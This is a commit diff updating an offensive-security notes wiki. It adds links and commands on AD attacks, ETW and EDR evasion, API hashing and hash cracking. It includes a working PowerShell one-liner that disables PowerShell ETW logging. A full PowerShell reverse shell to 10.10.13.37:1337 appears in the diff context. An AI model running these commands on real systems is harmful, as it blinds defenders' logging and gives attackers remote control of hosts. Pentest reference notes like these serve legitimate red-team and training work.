[AHK] Automatic update 👽

SUMMARY.md

@@ -27,6 +27,7 @@
       - [AppLocker Bypass](pentest/infrastructure/ad/av-edr-evasion/applocker-bypass.md)
       - [CLM Bypass](pentest/infrastructure/ad/av-edr-evasion/clm-bypass.md)
       - [Defender](pentest/infrastructure/ad/av-edr-evasion/defender.md)
+      - [ETW Block](pentest/infrastructure/ad/av-edr-evasion/etw-block.md)
       - [Execution Policy Bypass](pentest/infrastructure/ad/av-edr-evasion/executionpolicy-bypass.md)
       - [KIS / KES](pentest/infrastructure/ad/av-edr-evasion/kis-kes.md)
       - [Mimikatz](pentest/infrastructure/ad/av-edr-evasion/mimikatz.md)
@@ -169,6 +170,7 @@
 * [Cobalt Strike](redteam/cobalt-strike.md)
 * [Infrastructure](redteam/infrastructure.md)
 * [Malware Development](redteam/maldev/README.md)
+  - [API Hashing](redteam/maldev/api-hashing.md)
   - [API Hooking](redteam/maldev/api-hooking.md)
   - [BOF / COFF](redteam/maldev/bof-coff.md)
   - [Code Injection](redteam/maldev/code-injection/README.md)
@@ -183,6 +185,7 @@
   - [Windows API](redteam/maldev/winapi.md)
 * [SE](redteam/se/README.md)
   - [Phishing](redteam/se/phishing/README.md)
+    * [DLL Side-Loading](redteam/se/phishing/dll-side-loading.md)
     * [HTML Smuggling](redteam/se/phishing/html-smuggling.md)
     * [MS Office](redteam/se/phishing/ms-office.md)
 

admin/windows.md

@@ -170,6 +170,28 @@ Cmd > rundll32.exe keymgr.dll, KRShowKeyMgr
 ```
 
 
+## PowerShell Secure Strings
+
+Encrypt:
+
+```
+PS > $securePassword = Read-Host -AsSecureString "Enter password"  
+Enter password: Passw0rd!
+PS > $encString = $securePassword | ConvertFrom-SecureString
+PS > $encString  
+01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e179d870f4f6374bab8b8d97c5375ed10000000002000000000010660000000100002000000053096b407f1bb14d6555203b96e0347a12267b69689f4ec6ca38f8533cd0feef000000000e8000000002000020000000d75f103a0d4fd550919f027815fb0fa242e9d5e57a4c25eec436b5e515ea274720000000765dee14954b7bd7d1  
+34bd5919a35ceab1b8b2fdfbb31fe53a7aa8d1f9078604400000006f63448217f77956c05e0028dd92c2f2466d180b1cc35d05fb760f48e2c0cf125aac944cf099b9995dd6401facaa393d0f9b98ccf3f4daa1386910b8567e7635
+```
+
+Decrypt:
+
+```
+PS > $securePassword = ConvertTo-SecureString $encString -Force
+PS > (New-Object PSCredential 0, $securePassword).GetNetworkCredential().Password  
+Passw0rd!
+```
+
+
 
 
 ## Permissions

pentest/infrastructure/ad/README.md

@@ -187,6 +187,7 @@ MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETU
 
 - [https://blog.bitsadmin.com/blog/dealing-with-large-bloodhound-datasets](https://blog.bitsadmin.com/blog/dealing-with-large-bloodhound-datasets)
 - [https://github.com/bitsadmin/chophound](https://github.com/bitsadmin/chophound)
+- [https://github.com/knavesec/Max](https://github.com/knavesec/Max)
 
 {% embed url="https://youtu.be/o3W4H0UfDmQ" %}
 

pentest/infrastructure/ad/ad-cs-abuse/dnshostname-spoofing.md

@@ -7,6 +7,7 @@ description: CVE-2022-26923
 - [https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4)
 - [https://gist.github.com/Wh04m1001/355c0f697bfaaf6546e3b698295d1aa1](https://gist.github.com/Wh04m1001/355c0f697bfaaf6546e3b698295d1aa1)
 - [https://gist.github.com/dmchell/478d83f369260bd4e4cd380712f6bb6e](https://gist.github.com/dmchell/478d83f369260bd4e4cd380712f6bb6e)
+- [https://github.com/aniqfakhrul/certifried.py](https://github.com/aniqfakhrul/certifried.py)
 
 
 

pentest/infrastructure/ad/av-edr-evasion/etw-block.md

@@ -0,0 +1,26 @@
+---
+description: Event Tracing for Windows
+---
+
+# ETW
+
+- [https://bmcder.com/blog/a-begginers-all-inclusive-guide-to-etw](https://bmcder.com/blog/a-begginers-all-inclusive-guide-to-etw)
+
+
+
+
+## Disable PSEtwLogProvider
+
+- [https://gist.github.com/tandasat/e595c77c52e13aaee60e1e8b65d2ba32](https://gist.github.com/tandasat/e595c77c52e13aaee60e1e8b65d2ba32)
+
+```powershell
+[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
+```
+
+
+
+
+## Patch EtwEventWrite
+
+- [https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/](https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/)
+- [https://github.com/Flangvik/NetLoader/blob/master/Source/Program.cs#L241-L258](https://github.com/Flangvik/NetLoader/blob/master/Source/Program.cs#L241-L258)

pentest/infrastructure/ad/credentials-dump/ntds.md

@@ -141,7 +141,7 @@ $ antdsparse system.hive ntds.dit -o ntds.txt --progress
 
 Check if enabled globally:
 
-- gpmc.msc > *Computer Configuration* > *Policies* > *Windows Settings* > *Security Settings* > *Account Policies* > *Password Policy* > *Store passwords using reversible encryption* > *Enabled* ✔
+- gpmc.msc > Default Domain Policy > *Computer Configuration* > *Policies* > *Windows Settings* > *Security Settings* > *Account Policies* > *Password Policy* > *Store passwords using reversible encryption* > *Enabled* ✔
 
 Check if enabled for specific users:
 

pentest/infrastructure/ad/password-spraying.md

@@ -86,15 +86,14 @@ Another approach is to manually request all users via RPC (`$IPC` share):
 
 ```
 $ cme smb DCs.txt -u '' -p ''
-$ cme smb DCs.txt -u '' -p '' --pass-pol
 $ cme smb DCs.txt -u '' -p '' --users
 $ cme smb DCs.txt -u '' -p '' --groups
 ```
 
 - rpcclient:
 
 ```
-$ rpcclient -N -U '' -L 192.168.1.11
+$ rpcclient -N -U '' 192.168.1.11
 rpcclient $> enumdomusers
 rpcclient $> enumdomgroups
 ```

pentest/infrastructure/ad/rpc.md

@@ -18,7 +18,7 @@ description: Remote Procedure Call
 Check for null authentication:
 
 ```
-$ rpcclient -N -L 127.0.0.1
+$ rpcclient -N 127.0.0.1
 ```
 
 With user creds:

pentest/infrastructure/networks/README.md

@@ -1,5 +1,6 @@
 # Network
 
 - [https://github.com/frostbits-security/MITM-cheatsheet](https://github.com/frostbits-security/MITM-cheatsheet)
-- [https://xakep.ru/author/necreas1ng/](https://xakep.ru/author/necreas1ng/)
 - [https://xakep.ru/2021/08/25/stp-yersinia/](https://xakep.ru/2021/08/25/stp-yersinia/)
+- [https://xakep.ru/author/necreas1ng/](https://xakep.ru/author/necreas1ng/)
+- [https://habr.com/ru/users/Necreas1ng/](https://habr.com/ru/users/Necreas1ng/)

pentest/password-brute-force/README.md

@@ -34,3 +34,55 @@ $ hashcat -m 1000 -b
 | 1PH/s             |         1.000.000.000.000.000 | Одинквадриллион |
 | 1EH/s             |     1.000.000.000.000.000.000 | Одинквинтиллион |
 | 1ZH/s             | 1.000.000.000.000.000.000.000 | Одинсекстиллион |
+
+
+
+### TGS-REP with NTLM Wordlist
+
+- [https://github.com/hashcat/hashcat/pull/2607#issuecomment-850653034](https://github.com/hashcat/hashcat/pull/2607#issuecomment-850653034)
+
+Remove the following lines from `m13100_a0-optimized.cl` and compile:
+
+```
+  // K=MD4(Little_indian(UNICODE(pwd))
+
+  append_0x80_2x4 (w0_t, w1_t, pw_len);
+
+  make_utf16le (w1_t, w2_t, w3_t);
+  make_utf16le (w0_t, w0_t, w1_t);
+
+  w3_t[2] = pw_len * 8 * 2;
+  w3_t[3] = 0;
+
+  digest[0] = MD4M_A;
+  digest[1] = MD4M_B;
+  digest[2] = MD4M_C;
+  digest[3] = MD4M_D;
+
+  md4_transform (w0_t, w1_t, w2_t, w3_t, digest);
+
+  // K1=MD5_HMAC(K,1); with 2 encoded as little indian on 4 bytes (02000000 in hexa);
+
+  w0_t[0] = digest[0];
+  w0_t[1] = digest[1];
+  w0_t[2] = digest[2];
+  w0_t[3] = digest[3];
+  w1_t[0] = 0;
+  w1_t[1] = 0;
+  w1_t[2] = 0;
+  w1_t[3] = 0;
+  w2_t[0] = 0;
+  w2_t[1] = 0;
+  w2_t[2] = 0;
+  w2_t[3] = 0;
+  w3_t[0] = 0;
+  w3_t[1] = 0;
+  w3_t[2] = 0;
+  w3_t[3] = 0;
+```
+
+To crack:
+
+```
+$ hashcat -m 13100 -O tgsrep.in ntlm.wordlist --self-test-disable --hex-wordlist
+```

pentest/shells/reverse-shells.md

@@ -44,6 +44,7 @@ import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.conne
 * [https://github.com/besimorhino/powercat](https://github.com/besimorhino/powercat)
 * [https://gist.github.com/staaldraad/8473da7f2dfed28b2216b15ca6ebad11](https://gist.github.com/staaldraad/8473da7f2dfed28b2216b15ca6ebad11)
 * [https://github.com/tihanyin/PSSW100AVB/blob/main/ReverseShell_2022_03.ps1](https://github.com/tihanyin/PSSW100AVB/blob/main/ReverseShell_2022_03.ps1)
+* [https://github.com/antonioCoco/ConPtyShell](https://github.com/antonioCoco/ConPtyShell)
 
 ```powershell
 $client = New-Object System.Net.Sockets.TCPClient("10.10.13.37",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

redteam/infrastructure.md

@@ -18,7 +18,7 @@ Install:
 $ sudo mkdir -p /opt/nebula/certs
 $ sudo eget -s linux/amd64 --download-only slackhq/nebula --to /opt/nebula && cd /opt/nebula
 $ sudo tar -xzvf nebula-linux-amd64.tar.gz && sudo rm nebula-linux-amd64.tar.gz
-$ sudo mv nebula-cert certs
+$ sudo mv nebula-cert certs && cd certs
 ```
 
 Make certs for the **lighthouse**, **teamserver** and **proxy** (redirector):
@@ -110,7 +110,7 @@ lighthouse:
   am_lighthouse: false
   interval: 60
   hosts:
-    - "192.168.100.1"
+    - "10.10.13.1"
 
 listen:
   host: 0.0.0.0
@@ -183,7 +183,7 @@ lighthouse:
   am_lighthouse: false
   interval: 60
   hosts:
-    - "192.168.100.1"
+    - "10.10.13.1"
 
 listen:
   host: 0.0.0.0
@@ -245,6 +245,7 @@ firewall:
 
 Systemd [unit](https://github.com/slackhq/nebula/blob/master/examples/quickstart-vagrant/ansible/roles/nebula/files/systemd.nebula.service):
 
+{% code title="/etc/systemd/system/nebula.service" %}
 ```
 [Unit]
 Description=nebula
@@ -260,6 +261,7 @@ Restart=always
 [Install]
 WantedBy=multi-user.target
 ```
+{% endcode %}
 
 
 

redteam/maldev/api-hashing.md

@@ -0,0 +1,11 @@
+# API Hashing
+
+- [https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware](https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware)
+- [https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection](https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection)
+
+
+
+
+## Examples
+
+- [https://github.com/helpsystems/nanodump/blob/main/scripts/randomize_sw2_seed.py](https://github.com/helpsystems/nanodump/blob/main/scripts/randomize_sw2_seed.py)

redteam/maldev/bof-coff.md

@@ -77,6 +77,7 @@ beacon_command_register("msgbox", "Pops a message box", "Calls the MessageBoxA W
 - [https://github.com/trustedsec/COFFLoader](https://github.com/trustedsec/COFFLoader)
 - [https://skyblue.team/posts/invoke-bof/](https://skyblue.team/posts/invoke-bof/)
 - [https://github.com/airbus-cert/Invoke-Bof](https://github.com/airbus-cert/Invoke-Bof)
+- [https://github.com/Cracked5pider/CoffeeLdr](https://github.com/Cracked5pider/CoffeeLdr)
 
 
 

redteam/maldev/winapi.md

@@ -4,3 +4,5 @@
 - [https://github.com/EspressoCake/NativeFunctionStaticMap/blob/main/Native_API_Resolve.pdf](https://github.com/EspressoCake/NativeFunctionStaticMap/blob/main/Native_API_Resolve.pdf)
 - [https://github.com/LloydLabs/Windows-API-Hashing](https://github.com/LloydLabs/Windows-API-Hashing)
 - [https://github.com/MohitDabas/malwinx](https://github.com/MohitDabas/malwinx)
+- [https://fourcore.io/blogs/how-a-windows-process-is-created-part-1](https://fourcore.io/blogs/how-a-windows-process-is-created-part-1)
+- [https://fourcore.io/blogs/how-a-windows-process-is-created-part-2](https://fourcore.io/blogs/how-a-windows-process-is-created-part-2)